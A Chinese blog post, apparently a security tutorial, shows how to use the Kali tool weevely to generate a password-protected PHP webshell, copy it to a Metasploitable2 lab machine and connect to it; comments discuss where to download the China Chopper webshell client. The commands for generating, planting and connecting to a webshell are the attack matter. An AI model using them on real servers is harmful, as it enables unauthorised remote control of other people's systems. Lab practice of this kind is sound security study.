逍遥子

kali下的中国菜刀
weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更...
扫描右侧二维码阅读全文
04
2018/05

kali下的中国菜刀

weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利!下面我们来实例演示, weevely 的具体使用。

准备环境:

  • kali linux
  • Metasploitables2

首先还是先制作一个 webshell ,密码为 bbskali

weevely generate bbskali secist.php

可以看到,很快就为我们生成了一个大小1000多字节的 webshell 。

我们使用 cat 命令简单查看下 webshell 的内容:

cat /usr/share/weevely/secist.php

请输入图片描述
现在我将生成的 webshell 远程拷贝到目标机器上:

scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin

或者上传PHP木马

连接一句话木马

weevely http://192.168.30.128/secist.php secist

Last modification:May 4th, 2018 at 02:24 pm
正在沿街乞讨中……

Leave a Comment

3 comments

  1. nigle Edge 18.17763 Windows 10 中国 浙江 金华

    请问一下大佬windows的中国菜刀在哪下啊?
    我在百度中搜的网站系统说是不安全的下载,就不敢下了,生怕别人开了个后门。

    1. 逍遥子 搜狗浏览器 Build Android 9 中国 北京 北京
      @nigle

      菜刀是有官网的,只不过是报毒,其他网站的尽量不要用,后门较多!

      1. nigle Edge 18.17763 Windows 10 中国 江苏 扬州
        @逍遥子

        请问下是www.zhongguocaidao.com
        还是 www.maicaidao.co
        这两个都像官网欸OωO